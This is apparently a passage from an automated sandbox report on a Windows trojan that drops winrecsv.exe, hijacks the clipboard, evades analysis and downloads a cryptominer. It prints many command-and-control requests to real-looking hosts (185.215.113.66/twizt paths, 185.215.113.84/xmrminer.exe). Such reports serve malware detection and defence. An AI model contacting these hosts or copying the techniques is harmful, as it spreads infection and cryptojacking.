                          Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exer
                          Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exero/
                          Source: 509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exes
                          Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/xmrminer.exe~
                          Source: winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.drString found in binary or memory: http://2462462645.fr/
                          Source: Id4zlrsrZ4.exe, winrecsv.exe.0.drString found in binary or memory: http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaieg
                          Source: winrecsv.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: winrecsv.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                          Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040C840 recvfrom,Sleep,StrCmpNIA,StrStrIA,StrChrA,0_2_0040C840
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.84Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00403DB0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00403DB0
                          Source: Id4zlrsrZ4.exe, 00000000.00000002.348077392.000000000071A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00403DB0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00403DB0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00403480

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Source: Yara matchFile source: Id4zlrsrZ4.exe, type: SAMPLE
                          Source: Yara matchFile source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\winrecsv.exe, type: DROPPED
                          Source: Id4zlrsrZ4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeFile created: C:\Windows\winrecsv.exeJump to behavior
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_004092E00_2_004092E0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040F0880_2_0040F088
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00402E900_2_00402E90
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_004069500_2_00406950
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_004069790_2_00406979
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_004092E01_2_004092E0
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040F0881_2_0040F088
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00402E901_2_00402E90
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_004069501_2_00406950
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_004069791_2_00406979
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_004092E05_2_004092E0
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040F0885_2_0040F088
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00402E905_2_00402E90
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_004069505_2_00406950
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_004069795_2_00406979
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980,0_2_0040C210
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040F2CD NtQueryVirtualMemory,0_2_0040F2CD
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040C210
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040F2CD NtQueryVirtualMemory,1_2_0040F2CD
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980,5_2_0040C210
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040F2CD NtQueryVirtualMemory,5_2_0040F2CD
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\509517324.exe F97C43BF3DCE6180E658F2C3776E31CF52472B28AC8249BE4D307880B6405EEB
                          Source: Id4zlrsrZ4.exeVirustotal: Detection: 70%
                          Source: Id4zlrsrZ4.exeReversingLabs: Detection: 74%
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeFile read: C:\Users\user\Desktop\Id4zlrsrZ4.exeJump to behavior
                          Source: Id4zlrsrZ4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Id4zlrsrZ4.exe "C:\Users\user\Desktop\Id4zlrsrZ4.exe"
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeProcess created: C:\Windows\winrecsv.exe C:\Windows\winrecsv.exe
                          Source: unknownProcess created: C:\Windows\winrecsv.exe "C:\Windows\winrecsv.exe"
                          Source: C:\Windows\winrecsv.exeProcess created: C:\Users\user\AppData\Local\Temp\509517324.exe C:\Users\user~1\AppData\Local\Temp\509517324.exe
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeProcess created: C:\Windows\winrecsv.exe C:\Windows\winrecsv.exeJump to behavior
                          Source: C:\Windows\winrecsv.exeProcess created: C:\Users\user\AppData\Local\Temp\509517324.exe C:\Users\user~1\AppData\Local\Temp\509517324.exeJump to behavior
                          Source: C:\Windows\winrecsv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: C:\Windows\winrecsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\1[1]Jump to behavior
                          Source: C:\Windows\winrecsv.exeFile created: C:\Users\user~1\AppData\Local\Temp\509517324.exeJump to behavior
                          Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@8/7@0/7
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_004054D0 CoCreateInstance,0_2_004054D0
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_004050B0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,0_2_004050B0
                          Source: C:\Windows\winrecsv.exeMutant created: \Sessions\1\BaseNamedObjects\984658
                          Source: C:\Windows\winrecsv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeExecutable created and started: C:\Windows\winrecsv.exeJump to behavior
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeFile created: C:\Windows\winrecsv.exeJump to dropped file
                          Source: C:\Windows\winrecsv.exeFile created: C:\Users\user\AppData\Local\Temp\509517324.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeFile created: C:\Windows\winrecsv.exeJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeFile opened: C:\Users\user\Desktop\Id4zlrsrZ4.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\winrecsv.exeFile opened: C:\Windows\winrecsv.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\winrecsv.exeFile opened: C:\Users\user~1\AppData\Local\Temp\509517324.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeFile opened: C:\Users\user~1\AppData\Local\Temp\1840439288.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\winrecsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\winrecsv.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4253
                          Source: C:\Windows\winrecsv.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4253
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-4253
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-4253
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040B8F00_2_0040B8F0
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040B8F01_2_0040B8F0
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040B8F05_2_0040B8F0
                          Source: C:\Windows\winrecsv.exe TID: 6628Thread sleep time: -900000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exe TID: 6820Thread sleep time: -263395s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exe TID: 6820Thread sleep time: -225895s >= -30000sJump to behavior
                          Source: C:\Windows\winrecsv.exeLast function: Thread delayed
                          Source: C:\Windows\winrecsv.exeThread delayed: delay time: 900000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeThread delayed: delay time: 263395Jump to behavior
